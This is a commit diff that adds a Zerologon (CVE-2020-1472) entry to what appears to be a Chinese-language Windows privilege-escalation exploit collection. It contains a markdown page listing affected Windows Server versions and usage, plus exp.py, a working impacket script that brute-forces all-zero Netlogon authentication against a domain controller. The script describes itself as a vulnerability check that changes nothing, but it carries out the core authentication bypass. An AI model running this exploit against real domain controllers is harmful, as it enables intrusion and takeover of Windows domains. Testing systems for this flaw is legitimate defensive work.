add CVE-2020-1472 域内提权 漏洞

97-Windows提权/CVE-2020-1472/CVE-2020-1472.md

@@ -0,0 +1,28 @@
+# CVE-2020-1472 域内提权
+
+> NetLogon组件 是 Windows 上一项重要的功能组件，用于用户和机器在域内网络上的认证，以及复制数据库以进行域控备份，同时还用于维护域成员与域之间、域与域控之间、域DC与跨域DC之间的关系。
+
+### 影响版本
+* Windows Server 2008 R2 for x64-based Systems Service Pack 1
+* Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
+* Windows Server 2012
+* Windows Server 2012 (Server Core installation)
+* Windows Server 2012 R2
+* Windows Server 2012 R2 (Server Core installation)
+* Windows Server 2016
+* Windows Server 2016 (Server Core installation)
+* Windows Server 2019
+* Windows Server 2019 (Server Core installation)
+* Windows Server, version 1903 (Server Core installation)
+* Windows Server, version 1909 (Server Core installation)
+* Windows Server, version 2004 (Server Core installation)
+
+### 漏洞利用
+
+```shell
+pip install -r requirements.txt
+exp.py EXAMPLE-DC 1.2.3.4
+```
+
+`其中 EXAMPLE-DC 为域控名字,
+1.2.3.4 为域控IP`

97-Windows提权/CVE-2020-1472/exp.py

@@ -0,0 +1,87 @@
+#!/usr/bin/env python3
+
+from impacket.dcerpc.v5 import nrpc, epm
+from impacket.dcerpc.v5.dtypes import NULL
+from impacket.dcerpc.v5 import transport
+from impacket import crypto
+
+import hmac, hashlib, struct, sys, socket, time
+from binascii import hexlify, unhexlify
+from subprocess import check_call
+
+# Give up brute-forcing after this many attempts. If vulnerable, 256 attempts are expected to be neccessary on average.
+MAX_ATTEMPTS = 2000 # False negative chance: 0.04%
+
+def fail(msg):
+  print(msg, file=sys.stderr)
+  print('This might have been caused by invalid arguments or network issues.', file=sys.stderr)
+  sys.exit(2)
+
+def try_zero_authenticate(dc_handle, dc_ip, target_computer):
+  # Connect to the DC's Netlogon service.
+  binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp')
+  rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc()
+  rpc_con.connect()
+  rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
+
+  # Use an all-zero challenge and credential.
+  plaintext = b'\x00' * 8
+  ciphertext = b'\x00' * 8
+
+  # Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled. 
+  flags = 0x212fffff
+
+  # Send challenge and authentication request.
+  nrpc.hNetrServerReqChallenge(rpc_con, dc_handle + '\x00', target_computer + '\x00', plaintext)
+  try:
+    server_auth = nrpc.hNetrServerAuthenticate3(
+      rpc_con, dc_handle + '\x00', target_computer + '$\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
+      target_computer + '\x00', ciphertext, flags
+    )
+
+    
+    # It worked!
+    assert server_auth['ErrorCode'] == 0
+    return rpc_con
+
+  except nrpc.DCERPCSessionError as ex:
+    # Failure should be due to a STATUS_ACCESS_DENIED error. Otherwise, the attack is probably not working.
+    if ex.get_error_code() == 0xc0000022:
+      return None
+    else:
+      fail(f'Unexpected error code from DC: {ex.get_error_code()}.')
+  except BaseException as ex:
+    fail(f'Unexpected error: {ex}.')
+
+
+def perform_attack(dc_handle, dc_ip, target_computer):
+  # Keep authenticating until succesfull. Expected average number of attempts needed: 256.
+  print('Performing authentication attempts...')
+  rpc_con = None
+  for attempt in range(0, MAX_ATTEMPTS):  
+    rpc_con = try_zero_authenticate(dc_handle, dc_ip, target_computer)
+    
+    if not rpc_con:
+      print('=', end='', flush=True)
+    else:
+      break
+
+  if rpc_con:
+    print('\nSuccess! DC can be fully compromised by a Zerologon attack.')
+  else:
+    print('\nAttack failed. Target is probably patched.')
+    sys.exit(1)
+
+
+if __name__ == '__main__':
+  if not (3 <= len(sys.argv) <= 4):
+    print('Usage: exp.py <dc-name> <dc-ip>\n')
+    print('Tests whether a domain controller is vulnerable to the Zerologon attack. Does not attempt to make any changes.')
+    print('Note: dc-name should be the (NetBIOS) computer name of the domain controller.')
+    sys.exit(1)
+  else:
+    [_, dc_name, dc_ip] = sys.argv
+
+    dc_name = dc_name.rstrip('$')
+    perform_attack('\\\\' + dc_name, dc_ip, dc_name)
+